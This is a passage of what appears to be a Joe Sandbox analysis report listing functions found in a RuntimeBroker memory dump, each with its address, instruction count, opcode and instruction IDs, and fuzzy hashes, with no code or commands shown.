                                                                                                      • Opcode ID: 5d20c92c4eb0ac0111eca1a67a3ae5c6388f2ea77d878e820a742d9e5658fcae
                                                                                                      • Instruction ID: f631d0a9f9f243cb0125a2feb79002cca6851b831935300aed45c835dfa492a6
                                                                                                      • Opcode Fuzzy Hash: 5d20c92c4eb0ac0111eca1a67a3ae5c6388f2ea77d878e820a742d9e5658fcae
                                                                                                      • Instruction Fuzzy Hash: 81418030A19A1DCFEB68EF68C465BA977E4FB54316F10017EE04ED36A1CB75A841CB40
                                                                                                      Function 00007FFD9B9B8D2D Relevance: .1, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 095df8a139ed6693bedd5fe1299ec3d67e3cd5a195b5789c54674b9aaa327e40
                                                                                                      • Instruction ID: 2ba529cd6dd1e63fdc895e2f2c5281e20cbab6f2eb6045d6f4d1240b35def912
                                                                                                      • Opcode Fuzzy Hash: 095df8a139ed6693bedd5fe1299ec3d67e3cd5a195b5789c54674b9aaa327e40
                                                                                                      • Instruction Fuzzy Hash: 62412621B1E6C95FDB52AB7848B4AB97FE5DF9B215B0800FBE088C31E7DD185842C751
                                                                                                      Function 00007FFD9B9B81B1 Relevance: .1, Instructions: 143COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bdae09dd3e3c19061d77455bbac180a19a61d599668472dd180c5f9acd1f3838
                                                                                                      • Instruction ID: db21b34ffa23842748deefa7214385aca6aef15a5e1db496e47f42cf47401611
                                                                                                      • Opcode Fuzzy Hash: bdae09dd3e3c19061d77455bbac180a19a61d599668472dd180c5f9acd1f3838
                                                                                                      • Instruction Fuzzy Hash: CA41C471B1991D5FDF94EBA884A9ABC77E1FF99311B04017AD00DD32A2DF289841CB11
                                                                                                      Function 00007FFD9B9B04C8 Relevance: .1, Instructions: 138COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 64cdd6bff08c5ff7d22533038bf8b197aab0fb74c6fc3de0bda83220067949e6
                                                                                                      • Instruction ID: ae9614a3376f00ca5c8713967c32f51338f203fdd6759e6e1e23b93d411ec0ec
                                                                                                      • Opcode Fuzzy Hash: 64cdd6bff08c5ff7d22533038bf8b197aab0fb74c6fc3de0bda83220067949e6
                                                                                                      • Instruction Fuzzy Hash: 2B31D621B1995C0FEB98AB6C986AB7877C2EF99315F0501BEE05EC32D7DD649C428341
                                                                                                      Function 00007FFD9B9B0710 Relevance: .1, Instructions: 135COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0c18d254dffef6ae658269118b8dd00d004f318bc68be267325a00de060438b2
                                                                                                      • Instruction ID: 9932fff04922efb9db8d27ffac5cc28ac5afadd956588a8d9d656f80d3ba7643
                                                                                                      • Opcode Fuzzy Hash: 0c18d254dffef6ae658269118b8dd00d004f318bc68be267325a00de060438b2
                                                                                                      • Instruction Fuzzy Hash: D641B431F2855E4BDB98EBA894656B973E1FF58314F15017DD01EC32E6CE38A941CB41
                                                                                                      Function 00007FFD9B9B0E11 Relevance: .1, Instructions: 129COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9d97cdbc99254c363f04ed3be393e979ef89af2af4156ac981c8ed7c3b2484fb
                                                                                                      • Instruction ID: f96a5e899a5655d0a8ea604b5c9c60f627aa4ece12ebbcb1f0ef4f606815e8b6
                                                                                                      • Opcode Fuzzy Hash: 9d97cdbc99254c363f04ed3be393e979ef89af2af4156ac981c8ed7c3b2484fb
                                                                                                      • Instruction Fuzzy Hash: 0331E711B299094FEB84B7AC586ABFC77D2FF98751F0401BBE01DC32D6DE6899014782
                                                                                                      Function 00007FFD9B9B0CC1 Relevance: .1, Instructions: 121COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3ade7be2ba9869ad6c7bcdb5437a5ee5eb5aef60ebc2aff00bf2bf1033fa5958
                                                                                                      • Instruction ID: 8938d1fd196d8cdaad415eb098ae1e2a7ef5a2ef5e534c56405190275acc8dba
                                                                                                      • Opcode Fuzzy Hash: 3ade7be2ba9869ad6c7bcdb5437a5ee5eb5aef60ebc2aff00bf2bf1033fa5958
                                                                                                      • Instruction Fuzzy Hash: C841D220B29A5E9FEB88FBB88475AF977A1FF98300F5401B9D05DC32D6CE286801C751
                                                                                                      Function 00007FFD9B9BD092 Relevance: .1, Instructions: 120COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 54f30d0b33ddb550a68c9e23ace557cdb3ad49e6cc81c24c6115c58e8307221f
                                                                                                      • Instruction ID: d2a1c8190e56b2b9487d5e97e282f2dbd3cc10ceb28d5adba9396e0804a04f5e
                                                                                                      • Opcode Fuzzy Hash: 54f30d0b33ddb550a68c9e23ace557cdb3ad49e6cc81c24c6115c58e8307221f
                                                                                                      • Instruction Fuzzy Hash: DA31353190D78C9FDB19DBA8C855AE97BF0FF56320F0401AFD049C71A2CA696846CBA1
                                                                                                      Function 00007FFD9B9B0E30 Relevance: .1, Instructions: 116COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4e492328303ae906493f71e87f8099427dbd099c98a3cb564dbf86add11f5644
                                                                                                      • Instruction ID: ec442a0540471b0a7266db4199cfda846eb55d62f8b7aa01b1dbe30e51d15a0d
                                                                                                      • Opcode Fuzzy Hash: 4e492328303ae906493f71e87f8099427dbd099c98a3cb564dbf86add11f5644
                                                                                                      • Instruction Fuzzy Hash: 3931D611B28D0D4BEB94B7AC586ABFC77D2FF98751F00017AE01EC32DADD18A8014792
                                                                                                      Function 00007FFD9B9B93B5 Relevance: .1, Instructions: 109COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 40af6a53ef123eb1a7531e870ae09b65a4a126c83fed46eaafcd2be600e8ed7d
                                                                                                      • Instruction ID: 07d0a6f8a6802b21e995c9a0897625a47e4c0553d4162fe095ba76597d74e754
                                                                                                      • Opcode Fuzzy Hash: 40af6a53ef123eb1a7531e870ae09b65a4a126c83fed46eaafcd2be600e8ed7d
                                                                                                      • Instruction Fuzzy Hash: F531C13190D7488FDB29DFA8D849AE9BBF0EF56320F0482AFD049C35A2D724A405CB51
                                                                                                      Function 00007FFD9B9B9D5D Relevance: .1, Instructions: 106COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c5c3caa14e6279a4f38b18cb74f869085995b5f07ed1526fe1c723b2649326ca
                                                                                                      • Instruction ID: 5eb3489f1e135dbca1dff00263ef7b9e8ae415fcdc424cf6ff804f6d81030135
                                                                                                      • Opcode Fuzzy Hash: c5c3caa14e6279a4f38b18cb74f869085995b5f07ed1526fe1c723b2649326ca
                                                                                                      • Instruction Fuzzy Hash: FD31B731B1C51C9FE7A4FB288869BB977D1FF99320F5501B9E01DC72D6DE28A8018B41
                                                                                                      Function 00007FFD9B9BE545 Relevance: .1, Instructions: 106COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: eb652c00e642db838cf798e684bbe6840c34470d673c1bdaaefd97671fea439f
                                                                                                      • Instruction ID: 6e10e50e20ff79db6c0966ae3a718e6bd4da935c45aa1611b2703cffff4aa1ba
                                                                                                      • Opcode Fuzzy Hash: eb652c00e642db838cf798e684bbe6840c34470d673c1bdaaefd97671fea439f
                                                                                                      • Instruction Fuzzy Hash: 33313B30A1AA6D8FDBA5EB54C8646F9B7B5FF49301F1105BAD00DE22A5CE346F808F41
                                                                                                      Function 00007FFD9B9B8079 Relevance: .1, Instructions: 100COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 015d344b8ff3b634446f790506050accdd5f1162365e30fd7a1d037e7a8103d4
                                                                                                      • Instruction ID: c2eea0547376d86b23c87196ba1a59b62dfb255b6b61c6c10c7a5b6e95b17960
                                                                                                      • Opcode Fuzzy Hash: 015d344b8ff3b634446f790506050accdd5f1162365e30fd7a1d037e7a8103d4
                                                                                                      • Instruction Fuzzy Hash: 40312830B0D99E9FDB56FB7C8895AA877E0FF56315B0401A6E408C72E6CB3DA841CB45
                                                                                                      Function 00007FFD9B9B8375 Relevance: .1, Instructions: 92COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d12758ba2afb76bdb2a332464725c1636a008f3c84e728deafb43b9234fdd5e7
                                                                                                      • Instruction ID: 31bb676f7a4f99bc296ac4b0f523d407e8aff4e7328ee68fad57543ffa5ebafd
                                                                                                      • Opcode Fuzzy Hash: d12758ba2afb76bdb2a332464725c1636a008f3c84e728deafb43b9234fdd5e7
                                                                                                      • Instruction Fuzzy Hash: 3E213932A2A69E1FE75A97A49C724F97BB2FF45310B0600B6D05AD71E3CD1C2906C741
                                                                                                      Function 00007FFD9B9BC2E0 Relevance: .1, Instructions: 89COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0ba78df827ecb577d71e59bd07cd3be6ddf7f716be116b17824cba678f4b9251
                                                                                                      • Instruction ID: 5bfef300e49f2d1bbd3821b562b76175d8ef7874de4b35ac53d54dda6937e8f9
                                                                                                      • Opcode Fuzzy Hash: 0ba78df827ecb577d71e59bd07cd3be6ddf7f716be116b17824cba678f4b9251
                                                                                                      • Instruction Fuzzy Hash: 89211B30A1A91CCFDBA4EF68D464AB8B7B5FB8B305F511468D00DD32A2CB79A845CB14
                                                                                                      Function 00007FFD9B9BC759 Relevance: .1, Instructions: 80COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 00347a928d89f6f422d70d9ae327f8ed52e03941bd31a2eb23835c36df186684
                                                                                                      • Instruction ID: 71cfa03148f22525d6eb7f255852e0dc9c0b9927ef01eca7513836972af34e4a
                                                                                                      • Opcode Fuzzy Hash: 00347a928d89f6f422d70d9ae327f8ed52e03941bd31a2eb23835c36df186684
                                                                                                      • Instruction Fuzzy Hash: 48217131A1965E8FD744EF68D8619E97BB2FF45304F40457AE41DD32AACB39A900CBC1
                                                                                                      Function 00007FFD9B9BAF45 Relevance: .1, Instructions: 79COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a0c131752b0899ef5fef2daa2e6d3c7ee6c219860e5d83b5c3444beec2da0297
                                                                                                      • Instruction ID: 055134610d5d283ed2c9687ea4d6158a3470e62889b58a39c22cd1b78d141430
                                                                                                      • Opcode Fuzzy Hash: a0c131752b0899ef5fef2daa2e6d3c7ee6c219860e5d83b5c3444beec2da0297
                                                                                                      • Instruction Fuzzy Hash: 0C21D870A1E6DD9FDB92EBB844245FA7BF0EF46215B1501BBD04CC61A2DE281645CB41
                                                                                                      Function 00007FFD9B9BB061 Relevance: .1, Instructions: 79COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9d39a688a52a851d38a248880b03ab9a577e63aaa611392e93946c581539aacf
                                                                                                      • Instruction ID: 73be318860cf5fddf7ccc93f7fad5f9cfefbd9578fc1d4f039183fd1b823255f
                                                                                                      • Opcode Fuzzy Hash: 9d39a688a52a851d38a248880b03ab9a577e63aaa611392e93946c581539aacf
                                                                                                      • Instruction Fuzzy Hash: C4212E3050E6998FC751DBE4C8156E97BF0EF8A310F0941FBE04DD7192C62C5906CB51
                                                                                                      Function 00007FFD9B9B92D9 Relevance: .1, Instructions: 77COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4412ab5d5d512fed2d8096e92f1323b62a1ff9283a8e22949e0bb4dffe78b503
                                                                                                      • Instruction ID: ff24d2576a52c5e0ac11e2f0a6c85dde8b691154539768f4d6bc6c995dba7669
                                                                                                      • Opcode Fuzzy Hash: 4412ab5d5d512fed2d8096e92f1323b62a1ff9283a8e22949e0bb4dffe78b503
                                                                                                      • Instruction Fuzzy Hash: BD215B31B6E59E0FE755D7A84825AF93BE1EFCA314F0500BAD08EC31E2DD1C9A458752
                                                                                                      Function 00007FFD9B9B91C1 Relevance: .1, Instructions: 77COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4b499daebff428fdd8582249cf734604e0ebfe66665ab6519bd5abda9f4597f3
                                                                                                      • Instruction ID: bd8a68c30af900e7bbc8b2cc6bdb3dda01d20e18bc9bf7d7e26dd56a26ecca2a
                                                                                                      • Opcode Fuzzy Hash: 4b499daebff428fdd8582249cf734604e0ebfe66665ab6519bd5abda9f4597f3
                                                                                                      • Instruction Fuzzy Hash: A421D120B2C96D9AE745B3AC5836BF877C2EF98300F5101BAE02DC32D7CD1C69048792
                                                                                                      Function 00007FFD9B9B0758 Relevance: .1, Instructions: 71COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3e04f68f9ceb050a1247a9e9f3207cdd2ac6e4d0f003be9dffdf408d458867ac
                                                                                                      • Instruction ID: 18077ab9038c62cd2ad6bc2fe87e5942a0c3ea0f4cadbfb06bf96363e5bda77e
                                                                                                      • Opcode Fuzzy Hash: 3e04f68f9ceb050a1247a9e9f3207cdd2ac6e4d0f003be9dffdf408d458867ac
                                                                                                      • Instruction Fuzzy Hash: 0E116D71F2992E9FE7A8AB688094AB1B7D1FF98300F054179E01EC3190DF3879028B81
                                                                                                      Function 00007FFD9B9B12C1 Relevance: .1, Instructions: 71COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8a49346c98b55a076ba6dcd5ccb4847d4aced7e954f6e40fbe1ac0619ed17c4a
                                                                                                      • Instruction ID: fe4fc3c154eff97a07fb2c3874d73e8e583e70c844db39d357e3b0c785e9efd3
                                                                                                      • Opcode Fuzzy Hash: 8a49346c98b55a076ba6dcd5ccb4847d4aced7e954f6e40fbe1ac0619ed17c4a
                                                                                                      • Instruction Fuzzy Hash: E4113D21F3F6AA1BE32563B948325B83BA19F82354F4601B5D05CCA0E7ED1D5A054751
                                                                                                      Function 00007FFD9B9BC46D Relevance: .1, Instructions: 69COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 75caf6440629535cb7491a7e687ffbb6ed7594bbedddb9e0544904b91fe62f46
                                                                                                      • Instruction ID: ceaccb858007e2c442874a804b2c3db1136724bbfdc28cececd22b34b5d907e5
                                                                                                      • Opcode Fuzzy Hash: 75caf6440629535cb7491a7e687ffbb6ed7594bbedddb9e0544904b91fe62f46
                                                                                                      • Instruction Fuzzy Hash: DA113B22B0F7AE9BEB55BB7874755F93790AF02318F0401F3E0AD850D3ED1965498745
                                                                                                      Function 00007FFD9B9B137D Relevance: .1, Instructions: 67COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d470828274415ea1d1d169a15b17ee2694bcf4a0194a6bd12ef88b8380a9780b
                                                                                                      • Instruction ID: 7a8ca2a83ee19b7faf3aa92ac575131d436795c49ed50f124237e5c549e29d9c
                                                                                                      • Opcode Fuzzy Hash: d470828274415ea1d1d169a15b17ee2694bcf4a0194a6bd12ef88b8380a9780b
                                                                                                      • Instruction Fuzzy Hash: 1411E331A1964D9FE74CDF6884652B93BE1EF99201F4580BFD48ED36E1DB3915018700
                                                                                                      Function 00007FFD9B9B0790 Relevance: .1, Instructions: 66COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 61f4aed02d36a7e8a3ad1c58bbc86875f07b93e18d95ded5b32552512f531b65
                                                                                                      • Instruction ID: 3d11ab12b77bbade91141fce459801ef757dd63f69eb7a596045804aedbd6a54
                                                                                                      • Opcode Fuzzy Hash: 61f4aed02d36a7e8a3ad1c58bbc86875f07b93e18d95ded5b32552512f531b65
                                                                                                      • Instruction Fuzzy Hash: CF116320B2892D9AEB58B7AC5436FF973C6EF98700F5101B5F02DC32D6CD6969044792
                                                                                                      Function 00007FFD9B9B8479 Relevance: .1, Instructions: 62COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d3fa3773fe727562cb098650c7f556c88b83a478eca45cc1e93b7628f1c32c00
                                                                                                      • Instruction ID: 0e255340e7edf1b0b8e338ead39c5b870cf8138bb0ca57fcd3fc9eef5a3f5a9b
                                                                                                      • Opcode Fuzzy Hash: d3fa3773fe727562cb098650c7f556c88b83a478eca45cc1e93b7628f1c32c00
                                                                                                      • Instruction Fuzzy Hash: 5C115931A1995A8FE768DF2480A4670BBE1FF58310F0A82BED04DC31A1DF7CA941CB41
                                                                                                      Function 00007FFD9B9B84B9 Relevance: .1, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0b9bdad976f4e5ff78c28c9f4b47e0311a0a2918df34cc1403c09c156e13c684
                                                                                                      • Instruction ID: a6eea47ab92d041e0badd06e34a6e31761f07d10cc903d7dcfbe8f8eda29b8a1
                                                                                                      • Opcode Fuzzy Hash: 0b9bdad976f4e5ff78c28c9f4b47e0311a0a2918df34cc1403c09c156e13c684
                                                                                                      • Instruction Fuzzy Hash: 22110D71E1EA9E9FD7649F6484A46A07BE1FF54300F0545BAE009C31A1EF7CA945CB81
                                                                                                      Function 00007FFD9B9B7CA1 Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fc93d53169579635e075bbbc435cb2095c97bdb1e577c719b24a1a153d62c664
                                                                                                      • Instruction ID: 69ae3bffa2bf937f3c5191d428b21d183e82d4ae7e4beab6c58105f0b7fc8657
                                                                                                      • Opcode Fuzzy Hash: fc93d53169579635e075bbbc435cb2095c97bdb1e577c719b24a1a153d62c664
                                                                                                      • Instruction Fuzzy Hash: 9B010471E19A8D4FDB40ABA44C291ED7BF0FF14310F4101BBD418CB2D6EF2899448782
                                                                                                      Function 00007FFD9B9BE405 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
